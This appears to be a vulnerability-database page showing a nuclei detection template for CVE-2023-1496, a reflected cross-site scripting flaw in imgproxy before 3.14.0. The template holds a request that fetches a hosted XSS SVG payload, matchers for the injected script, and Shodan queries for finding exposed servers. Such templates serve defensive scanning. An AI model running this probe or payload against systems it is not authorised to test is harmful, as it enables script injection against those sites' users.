Lucene search
K

Imgproxy < 3.14.0 - Cross-site Scripting (XSS)

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 42 Views

Imgproxy < 3.14.0 - Cross-site Scripting (XSS) vulnerability in imgproxy prior to 3.14.0. Allows attacker to execute arbitrary JavaScript in victim's browser

Related
Refs
Code
id: CVE-2023-1496

info:
  name: Imgproxy < 3.14.0 - Cross-site Scripting (XSS)
  author: pdteam
  severity: medium
  description: Cross-site Scripting (XSS) - Reflected in GitHub repository imgproxy/imgproxy prior to 3.14.0.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions.
  remediation: |
    Upgrade to Imgproxy version 3.14.0 or later to mitigate this vulnerability.
  reference:
    - https://github.com/imgproxy/imgproxy/commit/62f8d08a93d301285dcd1dabcc7ba10c6c65b689
    - https://huntr.dev/bounties/de603972-935a-401a-96fb-17ddadd282b2
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2023-1496
    cwe-id: CWE-79
    epss-score: 0.01585
    epss-percentile: 0.72616
    cpe: cpe:2.3:a:evilmartians:imgproxy:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: evilmartians
    product: imgproxy
    shodan-query:
      - "Server: imgproxy"
      - "server: imgproxy"
  tags: cve,cve2023,huntr,imgproxy,xss,svg,evilmartians,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/unsafe/plain/https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/refs/heads/main/helpers/payloads/retool-xss.svg"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "alert(document.domain);"
          - "<?xml version"
          - '<script type="text/javascript">'
        condition: and

      - type: word
        part: header
        words:
          - "Content-Security-Policy: default-src 'none';"
        negative: true

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100a53ade44b9dcc5b60ed199c9b64435eee69286329a2ccef606c40f3ba7dc3b23022100ee9876f323904d9cdacd536d8885035f29b80d0fdf1aea7e9023a3a44c41d47f:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 3.15.4
CVSS 36.5
EPSS0.01585
SSVC
42